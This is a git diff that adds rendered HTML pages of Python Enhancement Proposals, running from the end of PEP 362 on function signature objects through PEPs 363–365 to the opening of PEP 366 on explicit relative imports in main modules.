      Python has no explicit syntax for defining positional-only +parameters, but many built-in and extension module functions +(especially those that accept only one or two parameters) +accept them.

      +
    • +
    • Parameter.POSITIONAL_OR_KEYWORD - value may be +supplied as either a keyword or positional argument +(this is the standard binding behaviour for functions +implemented in Python.)
    • +
    • Parameter.KEYWORD_ONLY - value must be supplied +as a keyword argument. Keyword only parameters are those +which appear after a “*” or “*args” entry in a Python +function definition.
    • +
    • Parameter.VAR_POSITIONAL - a tuple of positional +arguments that aren’t bound to any other parameter. +This corresponds to a “*args” parameter in a Python +function definition.
    • +
    • Parameter.VAR_KEYWORD - a dict of keyword arguments +that aren’t bound to any other parameter. This corresponds +to a “**kwargs” parameter in a Python function definition.
    • +
    +

    Always use Parameter.* constants for setting and checking +value of the kind attribute.

    +
    +
    +
  • +
  • +
    replace(*, name=<optional>, kind=<optional>, default=<optional>, annotation=<optional>) -> Parameter
    Creates a new Parameter instance based on the instance +replaced was invoked on. To override a Parameter +attribute, pass the corresponding argument. To remove +an attribute from a Parameter, pass Parameter.empty.
    +
    +
  • +
+

Parameter constructor:

+
    +
  • +
    Parameter(name, kind, *, annotation=Parameter.empty, default=Parameter.empty)
    Instantiates a Parameter object. name and kind are required, +while annotation and default are optional.
    +
    +
  • +
+

Two parameters are equal when they have equal names, kinds, defaults, +and annotations.

+

Parameter objects are immutable. Instead of modifying a Parameter object, +you can use Parameter.replace() to create a modified copy like so:

+
>>> param = Parameter('foo', Parameter.KEYWORD_ONLY, default=42)
+>>> str(param)
+'foo=42'
+
+>>> str(param.replace())
+'foo=42'
+
+>>> str(param.replace(default=Parameter.empty, annotation='spam'))
+"foo:'spam'"
+
+
+
+
+

BoundArguments Object

+

Result of a Signature.bind call. Holds the mapping of arguments +to the function’s parameters.

+

Has the following public attributes:

+
    +
  • +
    arguments : OrderedDict
    An ordered, mutable mapping of parameters’ names to arguments’ values. +Contains only explicitly bound arguments. Arguments for +which bind() relied on a default value are skipped.
    +
    +
  • +
  • +
    args : tuple
    Tuple of positional arguments values. Dynamically computed from +the ‘arguments’ attribute.
    +
    +
  • +
  • +
    kwargs : dict
    Dict of keyword arguments values. Dynamically computed from +the ‘arguments’ attribute.
    +
    +
  • +
+

The arguments attribute should be used in conjunction with +Signature.parameters for any arguments processing purposes.

+

args and kwargs properties can be used to invoke functions:

+
def test(a, *, b):
+    ...
+
+sig = signature(test)
+ba = sig.bind(10, b=20)
+test(*ba.args, **ba.kwargs)
+
+
+

Arguments which could be passed as part of either *args or **kwargs +will be included only in the BoundArguments.args attribute. Consider the +following example:

+
def test(a=1, b=2, c=3):
+    pass
+
+sig = signature(test)
+ba = sig.bind(a=10, c=13)
+
+>>> ba.args
+(10,)
+
+>>> ba.kwargs:
+{'c': 13}
+
+
+
+
+

Implementation

+

The implementation adds a new function signature() to the inspect +module. The function is the preferred way of getting a Signature for +a callable object.

+

The function implements the following algorithm:

+
    +
  • If the object is not callable - raise a TypeError
  • +
  • If the object has a __signature__ attribute and if it +is not None - return it
  • +
  • If it has a __wrapped__ attribute, return +signature(object.__wrapped__)
  • +
  • If the object is an instance of FunctionType, construct +and return a new Signature for it
  • +
  • If the object is a bound method, construct and return a new Signature +object, with its first parameter (usually self or cls) +removed. (classmethod and staticmethod are supported +too. Since both are descriptors, the former returns a bound method, +and the latter returns its wrapped function.)
  • +
  • If the object is an instance of functools.partial, construct +a new Signature from its partial.func attribute, and +account for already bound partial.args and partial.kwargs
  • +
  • If the object is a class or metaclass:
      +
    • If the object’s type has a __call__ method defined in +its MRO, return a Signature for it
    • +
    • If the object has a __new__ method defined in its MRO, +return a Signature object for it
    • +
    • If the object has a __init__ method defined in its MRO, +return a Signature object for it
    • +
    +
  • +
  • Return signature(object.__call__)
  • +
+

Note that the Signature object is created in a lazy manner, and +is not automatically cached. However, the user can manually cache a +Signature by storing it in the __signature__ attribute.

+

An implementation for Python 3.3 can be found at [1]. +The python issue tracking the patch is [2].

+
+
+

Design Considerations

+
+

No implicit caching of Signature objects

+

The first PEP design had a provision for implicit caching of Signature +objects in the inspect.signature() function. However, this has the +following downsides:

+
    +
  • If the Signature object is cached then any changes to the function +it describes will not be reflected in it. However, If the caching is +needed, it can be always done manually and explicitly
  • +
  • It is better to reserve the __signature__ attribute for the cases +when there is a need to explicitly set to a Signature object that +is different from the actual one
  • +
+
+
+

Some functions may not be introspectable

+

Some functions may not be introspectable in certain implementations of +Python. For example, in CPython, built-in functions defined in C provide +no metadata about their arguments. Adding support for them is out of +scope for this PEP.

+
+
+

Signature and Parameter equivalence

+

We assume that parameter names have semantic significance–two +signatures are equal only when their corresponding parameters are equal +and have the exact same names. Users who want looser equivalence tests, +perhaps ignoring names of VAR_KEYWORD or VAR_POSITIONAL parameters, will +need to implement those themselves.

+
+
+
+

Examples

+
+

Visualizing Callable Objects’ Signature

+

Let’s define some classes and functions:

+
from inspect import signature
+from functools import partial, wraps
+
+
+class FooMeta(type):
+    def __new__(mcls, name, bases, dct, *, bar:bool=False):
+        return super().__new__(mcls, name, bases, dct)
+
+    def __init__(cls, name, bases, dct, **kwargs):
+        return super().__init__(name, bases, dct)
+
+
+class Foo(metaclass=FooMeta):
+    def __init__(self, spam:int=42):
+        self.spam = spam
+
+    def __call__(self, a, b, *, c) -> tuple:
+        return a, b, c
+
+    @classmethod
+    def spam(cls, a):
+        return a
+
+
+def shared_vars(*shared_args):
+    """Decorator factory that defines shared variables that are
+       passed to every invocation of the function"""
+
+    def decorator(f):
+        @wraps(f)
+        def wrapper(*args, **kwargs):
+            full_args = shared_args + args
+            return f(*full_args, **kwargs)
+
+        # Override signature
+        sig = signature(f)
+        sig = sig.replace(tuple(sig.parameters.values())[1:])
+        wrapper.__signature__ = sig
+
+        return wrapper
+    return decorator
+
+
+@shared_vars({})
+def example(_state, a, b, c):
+    return _state, a, b, c
+
+
+def format_signature(obj):
+    return str(signature(obj))
+
+
+

Now, in the python REPL:

+
>>> format_signature(FooMeta)
+'(name, bases, dct, *, bar:bool=False)'
+
+>>> format_signature(Foo)
+'(spam:int=42)'
+
+>>> format_signature(Foo.__call__)
+'(self, a, b, *, c) -> tuple'
+
+>>> format_signature(Foo().__call__)
+'(a, b, *, c) -> tuple'
+
+>>> format_signature(Foo.spam)
+'(a)'
+
+>>> format_signature(partial(Foo().__call__, 1, c=3))
+'(b, *, c=3) -> tuple'
+
+>>> format_signature(partial(partial(Foo().__call__, 1, c=3), 2, c=20))
+'(*, c=20) -> tuple'
+
+>>> format_signature(example)
+'(a, b, c)'
+
+>>> format_signature(partial(example, 1, 2))
+'(c)'
+
+>>> format_signature(partial(partial(example, 1, b=2), c=3))
+'(b=2, c=3)'
+
+
+
+
+

Annotation Checker

+
import inspect
+import functools
+
+def checktypes(func):
+    '''Decorator to verify arguments and return types
+
+    Example:
+
+        >>> @checktypes
+        ... def test(a:int, b:str) -> int:
+        ...     return int(a * b)
+
+        >>> test(10, '1')
+        1111111111
+
+        >>> test(10, 1)
+        Traceback (most recent call last):
+          ...
+        ValueError: foo: wrong type of 'b' argument, 'str' expected, got 'int'
+    '''
+
+    sig = inspect.signature(func)
+
+    types = {}
+    for param in sig.parameters.values():
+        # Iterate through function's parameters and build the list of
+        # arguments types
+        type_ = param.annotation
+        if type_ is param.empty or not inspect.isclass(type_):
+            # Missing annotation or not a type, skip it
+            continue
+
+        types[param.name] = type_
+
+        # If the argument has a type specified, let's check that its
+        # default value (if present) conforms with the type.
+        if param.default is not param.empty and not isinstance(param.default, type_):
+            raise ValueError("{func}: wrong type of a default value for {arg!r}". \
+                             format(func=func.__qualname__, arg=param.name))
+
+    def check_type(sig, arg_name, arg_type, arg_value):
+        # Internal function that encapsulates arguments type checking
+        if not isinstance(arg_value, arg_type):
+            raise ValueError("{func}: wrong type of {arg!r} argument, " \
+                             "{exp!r} expected, got {got!r}". \
+                             format(func=func.__qualname__, arg=arg_name,
+                                    exp=arg_type.__name__, got=type(arg_value).__name__))
+
+    @functools.wraps(func)
+    def wrapper(*args, **kwargs):
+        # Let's bind the arguments
+        ba = sig.bind(*args, **kwargs)
+        for arg_name, arg in ba.arguments.items():
+            # And iterate through the bound arguments
+            try:
+                type_ = types[arg_name]
+            except KeyError:
+                continue
+            else:
+                # OK, we have a type for the argument, lets get the corresponding
+                # parameter description from the signature object
+                param = sig.parameters[arg_name]
+                if param.kind == param.VAR_POSITIONAL:
+                    # If this parameter is a variable-argument parameter,
+                    # then we need to check each of its values
+                    for value in arg:
+                        check_type(sig, arg_name, type_, value)
+                elif param.kind == param.VAR_KEYWORD:
+                    # If this parameter is a variable-keyword-argument parameter:
+                    for subname, value in arg.items():
+                        check_type(sig, arg_name + ':' + subname, type_, value)
+                else:
+                    # And, finally, if this parameter a regular one:
+                    check_type(sig, arg_name, type_, arg)
+
+        result = func(*ba.args, **ba.kwargs)
+
+        # The last bit - let's check that the result is correct
+        return_type = sig.return_annotation
+        if (return_type is not sig._empty and
+                isinstance(return_type, type) and
+                not isinstance(result, return_type)):
+
+            raise ValueError('{func}: wrong return type, {exp} expected, got {got}'. \
+                             format(func=func.__qualname__, exp=return_type.__name__,
+                                    got=type(result).__name__))
+        return result
+
+    return wrapper
+
+
+
+
+
+

Acceptance

+

PEP 362 was accepted by Guido, Friday, June 22, 2012 [3] . +The reference implementation was committed to trunk later that day.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0362.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0363/index.html b/pep-0363/index.html new file mode 100644 index 00000000000..7332810c86c --- /dev/null +++ b/pep-0363/index.html @@ -0,0 +1,370 @@ + + + + + + + + PEP 363 – Syntax For Dynamic Attribute Access | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 363 – Syntax For Dynamic Attribute Access

+
+
Author:
+
Ben North <ben at redfrontdoor.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
29-Jan-2007
+
Post-History:
+
12-Feb-2007
+
+
+
+
Table of Contents +
+
+

Warning

+

This PEP has been rejected.

+

×

+

See Mailing Lists Discussion for more information.

+

+
+
+

Abstract

+

Dynamic attribute access is currently possible using the “getattr” +and “setattr” builtins. The present PEP suggests a new syntax to +make such access easier, allowing the coder for example to write:

+
x.('foo_%d' % n) += 1
+
+z = y.('foo_%d' % n).('bar_%s' % s)
+
+
+

instead of:

+
attr_name = 'foo_%d' % n
+setattr(x, attr_name, getattr(x, attr_name) + 1)
+
+z = getattr(getattr(y, 'foo_%d' % n), 'bar_%s' % s)
+
+
+
+
+

Rationale

+

Dictionary access and indexing both have a friendly invocation +syntax: instead of x.__getitem__(12) the coder can write x[12]. +This also allows the use of subscripted elements in an augmented +assignment, as in “x[12] += 1”. The present proposal brings this +ease-of-use to dynamic attribute access too.

+

Attribute access is currently possible in two ways:

+
    +
  • When the attribute name is known at code-writing time, the +“.NAME” trailer can be used, as in:
    x.foo = 42
    +y.bar += 100
    +
    +
    +
  • +
  • When the attribute name is computed dynamically at run-time, the +“getattr” and “setattr” builtins must be used:
    x = getattr(y, 'foo_%d' % n)
    +setattr(z, 'bar_%s' % s, 99)
    +
    +
    +

    The “getattr” builtin also allows the coder to specify a default +value to be returned in the event that the object does not have +an attribute of the given name:

    +
    x = getattr(y, 'foo_%d' % n, 0)
    +
    +
    +
  • +
+

This PEP describes a new syntax for dynamic attribute access — +“x.(expr)” — with examples given in the Abstract above.

+

(The new syntax could also allow the provision of a default value in +the “get” case, as in:

+
x = y.('foo_%d' % n, None)
+
+
+

This 2-argument form of dynamic attribute access would not be +permitted as the target of an (augmented or normal) assignment. The +“Discussion” section below includes opinions specifically on the +2-argument extension.)

+

Finally, the new syntax can be used with the “del” statement, as in:

+
del x.(attr_name)
+
+
+
+
+

Impact On Existing Code

+

The proposed new syntax is not currently valid, so no existing +well-formed programs have their meaning altered by this proposal.

+

Across all “*.py” files in the 2.5 distribution, there are around +600 uses of “getattr”, “setattr” or “delattr”. They break down as +follows (figures have some room for error because they were +arrived at by partially-manual inspection):

+
c.300 uses of plain "getattr(x, attr_name)", which could be
+      replaced with the new syntax;
+
+c.150 uses of the 3-argument form, i.e., with the default
+      value; these could be replaced with the 2-argument form
+      of the new syntax (the cases break down into c.125 cases
+      where the attribute name is a literal string, and c.25
+      where it's only known at run-time);
+
+c.5   uses of the 2-argument form with a literal string
+      attribute name, which I think could be replaced with the
+      standard "x.attribute" syntax;
+
+c.120 uses of setattr, of which 15 use getattr to find the
+      new value; all could be replaced with the new syntax,
+      the 15 where getattr is also involved would show a
+      particular increase in clarity;
+
+c.5   uses which would have to stay as "getattr" because they
+      are calls of a variable named "getattr" whose default
+      value is the builtin "getattr";
+
+c.5   uses of the 2-argument form, inside a try/except block
+      which catches AttributeError and uses a default value
+      instead; these could use 2-argument form of the new
+      syntax;
+
+c.10  uses of "delattr", which could use the new syntax.
+
+
+

As examples, the line:

+
setattr(self, attr, change_root(self.root, getattr(self, attr)))
+
+
+

from Lib/distutils/command/install.py could be rewritten:

+
self.(attr) = change_root(self.root, self.(attr))
+
+
+

and the line:

+
setattr(self, method_name, getattr(self.metadata, method_name))
+
+
+

from Lib/distutils/dist.py could be rewritten:

+
self.(method_name) = self.metadata.(method_name)
+
+
+
+
+

Performance Impact

+

Initial pystone measurements are inconclusive, but suggest there may +be a performance penalty of around 1% in the pystones score with the +patched version. One suggestion is that this is because the longer +main loop in ceval.c hurts the cache behaviour, but this has not +been confirmed.

+

On the other hand, measurements suggest a speed-up of around 40–45% +for dynamic attribute access.

+
+
+

Error Cases

+

Only strings are permitted as attribute names, so for instance the +following error is produced:

+
>>> x.(99) = 8
+   Traceback (most recent call last):
+     File "<stdin>", line 1, in <module>
+   TypeError: attribute name must be string, not 'int'
+
+
+

This is handled by the existing PyObject_GetAttr function.

+
+
+

Draft Implementation

+

A draft implementation adds a new alternative to the “trailer” +clause in Grammar/Grammar; a new AST type, “DynamicAttribute” in +Python.asdl, with accompanying changes to symtable.c, ast.c, and +compile.c, and three new opcodes (load/store/del) with +accompanying changes to opcode.h and ceval.c. The patch consists +of c.180 additional lines in the core code, and c.100 additional +lines of tests. It is available as sourceforge patch #1657573 [1].

+
+
+

Mailing Lists Discussion

+

Initial posting of this PEP in draft form was to python-ideas on +20070209 [2], and the response was generally positive. The PEP was +then posted to python-dev on 20070212 [3], and an interesting +discussion ensued. A brief summary:

+

Initially, there was reasonable (but not unanimous) support for the +idea, although the precise choice of syntax had a more mixed +reception. Several people thought the “.” would be too easily +overlooked, with the result that the syntax could be confused with a +method/function call. A few alternative syntaxes were suggested:

+
obj.(foo)
+obj.[foo]
+obj.{foo}
+obj{foo}
+obj.*foo
+obj->foo
+obj<-foo
+obj@[foo]
+obj.[[foo]]
+
+
+

with “obj.[foo]” emerging as the preferred one. In this initial +discussion, the two-argument form was universally disliked, so it +was to be taken out of the PEP.

+

Discussion then took a step back to whether this particular feature +provided enough benefit to justify new syntax. As well as requiring +coders to become familiar with the new syntax, there would also be +the problem of backward compatibility — code using the new syntax +would not run on older pythons.

+

Instead of new syntax, a new “wrapper class” was proposed, with the +following specification / conceptual implementation suggested by +Martin von Löwis:

+
class attrs:
+   def __init__(self, obj):
+     self.obj = obj
+   def __getitem__(self, name):
+     return getattr(self.obj, name)
+   def __setitem__(self, name, value):
+     return setattr(self.obj, name, value)
+   def __delitem__(self, name):
+     return delattr(self, name)
+   def __contains__(self, name):
+     return hasattr(self, name)
+
+
+

This was considered a cleaner and more elegant solution to the +original problem. (Another suggestion was a mixin class providing +dictionary-style access to an object’s attributes.)

+

The decision was made that the present PEP did not meet the burden +of proof for the introduction of new syntax, a view which had been +put forward by some from the beginning of the discussion. The +wrapper class idea was left open as a possibility for a future PEP.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0363.rst

+

Last modified: 2024-04-14 20:08:31 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0364/index.html b/pep-0364/index.html new file mode 100644 index 00000000000..a73b15008a6 --- /dev/null +++ b/pep-0364/index.html @@ -0,0 +1,347 @@ + + + + + + + + PEP 364 – Transitioning to the Py3K Standard Library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 364 – Transitioning to the Py3K Standard Library

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
01-Mar-2007
+
Python-Version:
+
2.6
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 3108 describes the reorganization of the Python standard library +for the Python 3.0 release. This PEP describes a +mechanism for transitioning from the Python 2.x standard library to +the Python 3.0 standard library. This transition will allow and +encourage Python programmers to use the new Python 3.0 library names +starting with Python 2.6, while maintaining the old names for backward +compatibility. In this way, a Python programmer will be able to write +forward compatible code without sacrificing interoperability with +existing Python programs.

+
+
+

Rationale

+

PEP 3108 presents a rationale for Python standard library (stdlib) +reorganization. The reader is encouraged to consult that PEP for +details about why and how the library will be reorganized. Should +PEP 3108 be accepted in part or in whole, then it is advantageous to +allow Python programmers to begin the transition to the new stdlib +module names in Python 2.x, so that they can write forward compatible +code starting with Python 2.6.

+

Note that PEP 3108 proposes to remove some “silly old stuff”, +i.e. modules that are no longer useful or necessary. The PEP you are +reading does not address this because there are no forward +compatibility issues for modules that are to be removed, except to +stop using such modules.

+

This PEP concerns only the mechanism by which mappings from old stdlib +names to new stdlib names are maintained. Please consult PEP 3108 for +all specific module renaming proposals. Specifically see the section +titled Modules to Rename for guidelines on the old name to new +name mappings. The few examples in this PEP are given for +illustrative purposes only and should not be used for specific +renaming recommendations.

+
+
+

Supported Renamings

+

There are at least 4 use cases explicitly supported by this PEP:

+
    +
  • Simple top-level package name renamings, such as StringIO to +stringio;
  • +
  • Sub-package renamings where the package name may or may not be +renamed, such as email.MIMEText to email.mime.text;
  • +
  • Extension module renaming, such as cStringIO to cstringio;
  • +
  • Third party renaming of any of the above.
  • +
+

Two use cases supported by this PEP include renaming simple top-level +modules, such as StringIO, as well as modules within packages, +such as email.MIMEText.

+

In the former case, PEP 3108 currently recommends StringIO be +renamed to stringio, following PEP 8 recommendations.

+

In the latter case, the email 4.0 package distributed with Python 2.5 +already renamed email.MIMEText to email.mime.text, although it +did so in a one-off, uniquely hackish way inside the email package. +The mechanism described in this PEP is general enough to handle all +module renamings, obviating the need for the Python 2.5 hack (except +for backward compatibility with earlier Python versions).

+

An additional use case is to support the renaming of C extension +modules. As long as the new name for the C module is importable, it +can be remapped to the new name. E.g. cStringIO renamed to +cstringio.

+

Third party package renaming is also supported, via several public +interfaces accessible by any Python module.

+

Remappings are not performed recursively.

+
+
+

.mv files

+

Remapping files are called .mv files; the suffix was chosen to be +evocative of the Unix mv(1) command. An .mv file is a simple +line-oriented text file. All blank lines and lines that start with a +# are ignored. All other lines must contain two whitespace separated +fields. The first field is the old module name, and the second field +is the new module name. Both module names must be specified using +their full dotted-path names. Here is an example .mv file from +Python 2.6:

+
# Map the various string i/o libraries to their new names
+StringIO    stringio
+cStringIO   cstringio
+
+
+

.mv files can appear anywhere in the file system, and there is a +programmatic interface provided to parse them, and register the +remappings inside them. By default, when Python starts up, all the +.mv files in the oldlib package are read, and their remappings +are automatically registered. This is where all the module remappings +should be specified for top-level Python 2.x standard library modules.

+
+
+

Implementation Specification

+

This section provides the full specification for how module renamings +in Python 2.x are implemented. The central mechanism relies on +various import hooks as described in PEP 302. Specifically +sys.path_importer_cache, sys.path, and sys.meta_path are +all employed to provide the necessary functionality.

+

When Python’s import machinery is initialized, the oldlib package is +imported. Inside oldlib there is a class called OldStdlibLoader. +This class implements the PEP 302 interface and is automatically +instantiated, with zero arguments. The constructor reads all the +.mv files from the oldlib package directory, automatically +registering all the remappings found in those .mv files. This is +how the Python 2.x standard library is remapped.

+

The OldStdlibLoader class should not be instantiated by other Python +modules. Instead, you can access the global OldStdlibLoader instance +via the sys.stdlib_remapper instance. Use this instance if you want +programmatic access to the remapping machinery.

+

One important implementation detail: as needed by the PEP 302 API, a +magic string is added to sys.path, and module __path__ attributes in +order to hook in our remapping loader. This magic string is currently +<oldlib> and some changes were necessary to Python’s site.py file +in order to treat all sys.path entries starting with < as +special. Specifically, no attempt is made to make them absolute file +names (since they aren’t file names at all).

+

In order for the remapping import hooks to work, the module or package +must be physically located under its new name. This is because the +import hooks catch only modules that are not already imported, and +cannot be imported by Python’s built-in import rules. Thus, if a +module has been moved, say from Lib/StringIO.py to Lib/stringio.py, +and the former’s .pyc file has been removed, then without the +remapper, this would fail:

+
import StringIO
+
+
+

Instead, with the remapper, this failing import will be caught, the +old name will be looked up in the registered remappings, and in this +case, the new name stringio will be found. The remapper then +attempts to import the new name, and if that succeeds, it binds the +resulting module into sys.modules, under both the old and new names. +Thus, the above import will result in entries in sys.modules for +‘StringIO’ and ‘stringio’, and both will point to the exact same +module object.

+

Note that no way to disable the remapping machinery is proposed, short +of moving all the .mv files away or programmatically removing them +in some custom start up code. In Python 3.0, the remappings will be +eliminated, leaving only the “new” names.

+
+
+

Programmatic Interface

+

Several methods are added to the sys.stdlib_remapper object, which +third party packages can use to register their own remappings. Note +however that in all cases, there is one and only one mapping from an +old name to a new name. If two .mv files contain different +mappings for an old name, or if a programmatic call is made with an +old name that is already remapped, the previous mapping is lost. This +will not affect any already imported modules.

+

The following methods are available on the sys.stdlib_remapper +object:

+
    +
  • read_mv_file(filename) – Read the given file and register all +remappings found in the file.
  • +
  • read_directory_mv_files(dirname, suffix='.mv') – List the given +directory, reading all files in that directory that have the +matching suffix (.mv by default). For each parsed file, +register all the remappings found in that file.
  • +
  • set_mapping(oldname, newname) – Register a new mapping from an +old module name to a new module name. Both must be the full +dotted-path name to the module. newname may be None in which +case any existing mapping for oldname will be removed (it is not an +error if there is no existing mapping).
  • +
  • get_mapping(oldname, default=None) – Return any registered +newname for the given oldname. If there is no registered remapping, +default is returned.
  • +
+
+
+

Open Issues

+
    +
  • Should there be a command line switch and/or environment variable to +disable all remappings?
  • +
  • Should remappings occur recursively?
  • +
  • Should we automatically parse package directories for .mv files when +the package’s __init__.py is loaded? This would allow packages to +easily include .mv files for their own remappings. Compare what the +email package currently has to do if we place its .mv file in +the email package instead of in the oldlib package:
    # Expose old names
    +import os, sys
    +sys.stdlib_remapper.read_directory_mv_files(os.path.dirname(__file__))
    +
    +
    +

    I think we should automatically read a package’s directory for any +.mv files it might contain.

    +
  • +
+
+
+

Reference Implementation

+

A reference implementation, in the form of a patch against the current +(as of this writing) state of the Python 2.6 svn trunk, is available +as SourceForge patch #1675334 [1]. Note that this patch includes a +rename of cStringIO to cstringio, but this is primarily for +illustrative and unit testing purposes. Should the patch be accepted, +we might want to split this change off into other PEP 3108 changes.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0364.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0365/index.html b/pep-0365/index.html new file mode 100644 index 00000000000..94c0a9d8c6e --- /dev/null +++ b/pep-0365/index.html @@ -0,0 +1,221 @@ + + + + + + + + PEP 365 – Adding the pkg_resources module | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 365 – Adding the pkg_resources module

+
+
Author:
+
Phillip J. Eby <pje at telecommunity.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
30-Apr-2007
+
Post-History:
+
30-Apr-2007
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding an enhanced version of the pkg_resources +module to the standard library.

+

pkg_resources is a module used to find and manage Python +package/version dependencies and access bundled files and resources, +including those inside of zipped .egg files. Currently, +pkg_resources is only available through installing the entire +setuptools distribution, but it does not depend on any other part +of setuptools; in effect, it comprises the entire runtime support +library for Python Eggs, and is independently useful.

+

In addition, with one feature addition, this module could support +easy bootstrap installation of several Python package management +tools, including setuptools, workingenv, and zc.buildout.

+
+
+

Proposal

+

Rather than proposing to include setuptools in the standard +library, this PEP proposes only that pkg_resources be added to the +standard library for Python 2.6 and 3.0. pkg_resources is +considerably more stable than the rest of setuptools, with virtually +no new features being added in the last 12 months.

+

However, this PEP also proposes that a new feature be added to +pkg_resources, before being added to the stdlib. Specifically, it +should be possible to do something like:

+
python -m pkg_resources SomePackage==1.2
+
+
+

to request downloading and installation of SomePackage from PyPI. +This feature would not be a replacement for easy_install; +instead, it would rely on SomePackage having pure-Python .egg +files listed for download via the PyPI XML-RPC API, and the eggs would +be placed in the $PYTHON_EGG_CACHE directory, where they would +not be importable by default. (And no scripts would be installed.) +However, if the download egg contains installation bootstrap code, it +will be given a chance to run.

+

These restrictions would allow the code to be extremely simple, yet +still powerful enough to support users downloading package management +tools such as setuptools, workingenv and zc.buildout, +simply by supplying the tool’s name on the command line.

+
+
+

Rationale

+

Many users have requested that setuptools be included in the +standard library, to save users needing to go through the awkward +process of bootstrapping it. However, most of the bootstrapping +complexity comes from the fact that setuptools-installed code cannot +use the pkg_resources runtime module unless setuptools is already +installed. Thus, installing setuptools requires (in a sense) that +setuptools already be installed.

+

Other Python package management tools, such as workingenv and +zc.buildout, have similar bootstrapping issues, since they both +make use of setuptools, but also want to provide users with something +approaching a “one-step install”. The complexity of creating bootstrap +utilities for these and any other such tools that arise in future, is +greatly reduced if pkg_resources is already present, and is also +able to download pre-packaged eggs from PyPI.

+

(It would also mean that setuptools would not need to be installed +in order to simply use eggs, as opposed to building them.)

+

Finally, in addition to providing access to eggs built via setuptools +or other packaging tools, it should be noted that since Python 2.5, +the distutils install package metadata (aka PKG-INFO) files that +can be read by pkg_resources to identify what distributions are +already on sys.path. In environments where Python packages are +installed using system package tools (like RPM), the pkg_resources +module provides an API for detecting what versions of what packages +are installed, even if those packages were installed via the distutils +instead of setuptools.

+
+
+

Implementation and Documentation

+

The pkg_resources implementation is maintained in the Python +SVN repository under /sandbox/trunk/setuptools/; see +pkg_resources.py and pkg_resources.txt. Documentation for the +egg format(s) supported by pkg_resources can be found in +doc/formats.txt. HTML versions of these documents are available +at:

+ +

(These HTML versions are for setuptools 0.6; they may not reflect all +of the changes found in the Subversion trunk’s .txt versions.)

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0365.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0366/index.html b/pep-0366/index.html new file mode 100644 index 00000000000..7b3c80cb95f --- /dev/null +++ b/pep-0366/index.html @@ -0,0 +1,258 @@ + + + + + + + + PEP 366 – Main module explicit relative imports | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 366 – Main module explicit relative imports

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
01-May-2007
+
Python-Version:
+
2.6, 3.0
+
Post-History:
+
01-May-2007, 04-Jul-2007, 07-Jul-2007, 23-Nov-2007
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a backwards compatible mechanism that permits +the use of explicit relative imports from executable modules within +packages. Such imports currently fail due to an awkward interaction +between PEP 328 and PEP 338.

+

By adding a new module level attribute, this PEP allows relative imports +to work automatically if the module is executed using the -m switch. +A small amount of boilerplate in the module itself will allow the relative +imports to work when the file is executed by name.

+

Guido accepted the PEP in November 2007 [5].

+
+
+

Proposed Change

+

The major proposed change is the introduction of a new module level +attribute, __package__. When it is present, relative imports will +be based on this attribute rather than the module __name__ +attribute.

+

As with the current __name__ attribute, setting __package__ will +be the responsibility of the PEP 302 loader used to import a module. +Loaders which use imp.new_module() to create the module object will +have the new attribute set automatically to None. When the import +system encounters an explicit relative import in a module without +__package__ set (or with it set to None), it will calculate and +store the correct value (__name__.rpartition('.')[0] for normal +modules and __name__ for package initialisation modules). If +__package__ has already been set then the import system will use +it in preference to recalculating the package name from the +__name__ and __path__ attributes.

+

The runpy module will explicitly set the new attribute, basing it off +the name used to locate the module to be executed rather than the name +used to set the module’s __name__ attribute. This will allow relative +imports to work correctly from main modules executed with the -m +switch.

+

When the main module is specified by its filename, then the +__package__ attribute will be set to None. To allow +relative imports when the module is executed directly, boilerplate +similar to the following would be needed before the first relative +import statement:

+
if __name__ == "__main__" and __package__ is None:
+    __package__ = "expected.package.name"
+
+
+

Note that this boilerplate is sufficient only if the top level package +is already accessible via sys.path. Additional code that manipulates +sys.path would be needed in order for direct execution to work +without the top level package already being importable.

+

This approach also has the same disadvantage as the use of absolute +imports of sibling modules - if the script is moved to a different +package or subpackage, the boilerplate will need to be updated +manually. It has the advantage that this change need only be made +once per file, regardless of the number of relative imports.

+

Note that setting __package__ to the empty string explicitly is +permitted, and has the effect of disabling all relative imports from +that module (since the import machinery will consider it to be a +top level module in that case). This means that tools like runpy +do not need to provide special case handling for top level modules +when setting __package__.

+
+
+

Rationale for Change

+

